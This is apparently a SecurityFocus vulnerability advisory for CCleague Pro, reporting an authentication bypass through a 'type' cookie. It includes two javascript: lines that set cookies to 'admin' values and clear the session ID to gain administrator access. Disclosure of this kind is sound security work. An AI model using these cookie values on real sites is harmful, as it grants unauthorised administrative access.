CCleague Pro 'type' Cookie Parameter Authentication Bypass Vulnerability

Attackers may exploit this issue through a browser.

The following example code is available:

javascript:document.cookie = "type=admin; path=/"; document.cookie = "PHPSESSID=; path=/";
javascript:document.cookie = "u=admin@domain.com; path=/";


 

Privacy Statement
Copyright 2010, SecurityFocus